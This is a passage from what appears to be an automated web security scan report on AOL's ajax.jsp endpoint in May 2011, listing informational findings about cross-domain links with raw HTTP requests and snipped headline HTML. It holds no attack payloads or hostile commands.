  • http://www.tvsquad.com/2011/05/05/betty-white-upsets-letterman-photo-of-leno-in-book-video/
  • http://www.tvsquad.com/2011/05/05/kate-hudson-teaches-leno-trick-determine-gender-baby-video/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614702632-Repeat%7C1367686702632%3B%20s_nrgvo%3DRepeat%7C1367686702634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:59:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-36.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2522
Set-Cookie: JSESSIONID=41AEA304D028DFC4041FD9E9918D8780; Path=/aol
Content-Length: 2522

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-60585 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl3|sec1_lnk1|60585" href="http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/"><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/962ab85e9f469332d79a7364f9c4d87e/judges-386a-05052011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl3_hdln" href="http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl3|sec1_lnk2|60585">Very Emotional Performance on 'Idol'</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl3_cpy" href="http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl3|sec1_lnk3|60585">Reason he almost started crying</a>
...[SNIP]...
<li ><a name="om_dl3_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl3|sec3_lnk1|60585" href="http://www.tvsquad.com/2011/05/05/bad-experience-at-male-strip-club-ellie-kemper-kimmel-video/">Actress' Bad Strip Club Experience</a>
...[SNIP]...
<li ><a name="om_dl3_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl3|sec3_lnk2|60585" href="http://www.tvsquad.com/2011/05/05/betty-white-upsets-letterman-photo-of-leno-in-book-video/">Betty White Photo 'Upsets' Letterman</a>
...[SNIP]...
<li ><a name="om_dl3_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl3|sec3_lnk3|60585" href="http://www.tvsquad.com/2011/05/05/kate-hudson-teaches-leno-trick-determine-gender-baby-video/">Kate Hudson Dishes About Pregnancy</a>
...[SNIP]...

16.17. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following link to another domain:
  • http://o.aolcdn.com/hss/storage/adam/c4f11f0825573fccecd92b3ec3faca91/vegas-hotels-386lvg050411.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-46.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3580
Set-Cookie: JSESSIONID=C2EF40E52E599258E45893C5902F838E; Path=/aol
Content-Length: 3580

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-60526 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</b><img height="217" alt="MGM Grand Hotel on the Las Vegas Strip" width="386" src="http://o.aolcdn.com/hss/storage/adam/c4f11f0825573fccecd92b3ec3faca91/vegas-hotels-386lvg050411.jpg"/></a>
...[SNIP]...

16.18. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following link to another domain:
  • http://o.aolcdn.com/hss/storage/adam/bf24920b004e4f94f1bc4d54ca23eaa5/my-next-move-386lvg050411.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614702632-Repeat%7C1367686702632%3B%20s_nrgvo%3DRepeat%7C1367686702634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:59:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-49.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2604
Set-Cookie: JSESSIONID=C1C7A81EEEE390BC7550ADA67D35FF85; Path=/aol
Content-Length: 2604

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-60589 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl4|sec1_lnk1|60589" href="http://realestate.aol.com/blog/2011/05/04/personal-letter-lands-a-home-sale/"><img height="217" alt="The Larez family in a pool" width="386" src="http://o.aolcdn.com/hss/storage/adam/bf24920b004e4f94f1bc4d54ca23eaa5/my-next-move-386lvg050411.jpg"/></a>
...[SNIP]...

16.19. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/37fccabc05e29ee5afc453ef1961b7d3/girl-on-tire-swing-hyperactive-kids-386kk0502.jpg
  • http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502
  • http://www.everydayhealth.com/arthritis/exercise.aspx?xid=aol_eh-arthritis_21-_20100502
  • http://www.everydayhealth.com/digestive-health/is-medication-causing-your-heartburn.aspx?xid=aol_eh-digest_9-_20100502
  • http://www.everydayhealth.com/menopause/the-optimal-menopause-diet.aspx?xid=aol_eh-meno_37-_20100502

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl9

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:13 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2663
Set-Cookie: JSESSIONID=0C6F14C2DC2CFF449830B109CA6F9B76; Path=/aol
Content-Length: 2663

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-60284 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl10_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl10|sec1_lnk1|60284" href="http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502"><img height="217" alt="Kid on Tire Swing" width="386" src="http://o.aolcdn.com/hss/storage/adam/37fccabc05e29ee5afc453ef1961b7d3/girl-on-tire-swing-hyperactive-kids-386kk0502.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl10_hdln" onclick=" " href="http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl10|sec1_lnk2|60284">Are All Children With ADHD Hyper?
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl10_cpy" href="http://www.everydayhealth.com/adhd-quiz/adhd-myths-and-facts.aspx?xid=aol_eh-adhd_3-_20100502" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl10|sec1_lnk3|60284">Truth about other common beliefs
</a>
...[SNIP]...
<li ><a name="om_dl10_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl10|sec3_lnk1|60284" href="http://www.everydayhealth.com/digestive-health/is-medication-causing-your-heartburn.aspx?xid=aol_eh-digest_9-_20100502">Real Reason You Have Heartburn?
</a>
...[SNIP]...
<li ><a name="om_dl10_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl10|sec3_lnk2|60284" href="http://www.everydayhealth.com/menopause/the-optimal-menopause-diet.aspx?xid=aol_eh-meno_37-_20100502">Foods to Make Menopause Easier
</a>
...[SNIP]...
<li ><a name="om_dl10_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl10|sec3_lnk3|60284" href="http://www.everydayhealth.com/arthritis/exercise.aspx?xid=aol_eh-arthritis_21-_20100502">Moves That May Relieve Joint Pain
</a>
...[SNIP]...

16.20. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/4e60d1b89f82902389aa73550195bdce/jennifer-anistons-house-sale-386lvg050311.jpg
  • http://www.diylife.com/2011/05/03/snake-a-drain/
  • http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/
  • http://www.shelterpop.com/2011/05/04/green-decorating/
  • http://www.shelterpop.com/2011/05/04/home-evan-oliver-haslegrave/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=rr1~5~1304556981389~0; stips5=1; s_pers=%20s_getnr%3D1304575060472-Repeat%7C1367647060472%3B%20s_nrgvo%3DRepeat%7C1367647060473%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2376
Set-Cookie: JSESSIONID=D83438BF4B049481E906301797B76CFC; Path=/aol
Content-Length: 2376

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-60535 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|60535" href="http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/"><img height="217" alt="Jen Aniston Home" width="386" src="http://o.aolcdn.com/hss/storage/adam/4e60d1b89f82902389aa73550195bdce/jennifer-anistons-house-sale-386lvg050311.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" href="http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|60535">We Made Over Aniston's Home
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.shelterpop.com/2011/05/03/jennifer-aniston-home-la/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|60535">Pics show mistakes she was making
</a>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl7|sec3_lnk1|60535" href="http://www.shelterpop.com/2011/05/04/green-decorating/">Color Is Perfect for Spring Decor
</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|60535" href="http://www.shelterpop.com/2011/05/04/home-evan-oliver-haslegrave/">Bookshelf Like You've Never Seen
</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|60535" href="http://www.diylife.com/2011/05/03/snake-a-drain/">How to Tackle a Nasty Drain Clog
</a>
...[SNIP]...

16.21. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273999/thumbs/a-MARIE-OSMOND-WEDDING-386x217.jpg
  • http://www.popeater.com/2011/05/04/mariah-carey-nick-cannon-baby-names-moroccan-monroe/
  • http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/
  • http://www.popeater.com/2011/05/04/neil-patrick-harris-tony-awards-host/
  • http://www.spinner.com/2011/05/03/decemberists-jenny-conlee-breast-cancer/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-46.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2444
Set-Cookie: JSESSIONID=C32A8A4C7E5DC5C5091D8C717570ECC7; Path=/aol
Content-Length: 2444

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-60523 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|60523" href="http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/"><img height="217" alt="Marie Osmond and Stephen Craig" width="386" src="http://i.huffpost.com/gen/273999/thumbs/a-MARIE-OSMOND-WEDDING-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl2_hdln" href="http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|60523">Marie Osmond Remarries First Husband
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl2_cpy" href="http://www.popeater.com/2011/05/04/marie-osmond-remarry-stephen-craig/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|60523">More details about the couple's nuptials
</a>
...[SNIP]...
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|60523" href="http://www.popeater.com/2011/05/04/mariah-carey-nick-cannon-baby-names-moroccan-monroe/">Mariah & Nick Reveal Baby Names
</a>
...[SNIP]...
<li ><a name="om_dl2_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl2|sec3_lnk2|60523" href="http://www.popeater.com/2011/05/04/neil-patrick-harris-tony-awards-host/">Actor Picked to Host Tony Awards?
</a>
...[SNIP]...
<li ><a name="om_dl2_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl2|sec3_lnk3|60523" href="http://www.spinner.com/2011/05/03/decemberists-jenny-conlee-breast-cancer/">Musician, 39, Diagnosed With Cancer
</a>
...[SNIP]...

16.22. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://aol.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april
  • http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter
  • http://aol.sportingnews.com/nfl/story/2011-05-04/willie-parker-calls-out-redskins-they-were-about-partying
  • http://o.aolcdn.com/hss/storage/adam/d73071bf1f5d4a1abaa210f17c3eb9ef/mendenhall-386cm050411.jpg
  • http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~3~1304556981389~0; stips5=1; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2862
Set-Cookie: JSESSIONID=9215E915DD093CF30868FC885D4B3289; Path=/aol
Content-Length: 2862

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-60545 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl4|sec1_lnk1|60545" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter"><span class="overlay"></span><img height="217" alt="Rashard Mendenhall" width="386" src="http://o.aolcdn.com/hss/storage/adam/d73071bf1f5d4a1abaa210f17c3eb9ef/mendenhall-386cm050411.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl4_hdln" onclick=" " href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl4|sec1_lnk2|60545">An NFL Star and His 9/11 Lesson</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl4_cpy" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl4|sec1_lnk3|60545">What today's athletes must remember
</a>
...[SNIP]...
<li ><a name="om_dl4_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl4|sec3_lnk1|60545" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/">Ex-NHL Player to Make MMA Debut</a>
...[SNIP]...
<li ><a name="om_dl4_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl4|sec3_lnk2|60545" href="http://aol.sportingnews.com/nfl/story/2011-05-04/willie-parker-calls-out-redskins-they-were-about-partying">Former NFL RB Rips Redskins Stars</a>
...[SNIP]...
<li ><a name="om_dl4_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl4|sec3_lnk3|60545" href="http://aol.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april">Thieves Raid Boston Celtics Team Bus</a>
...[SNIP]...

16.23. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config
The response contains the following links to other domains:
  • http://o.aolcdn.com/hss/storage/adam/3e43af495c5451bcd133636275a49d35/child-mickey-mouse-hat-disney-386nm050411.jpg
  • http://www.gadling.com/2011/05/03/gadlings-rankings-of-hotel-breakfast-buffet-foods/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
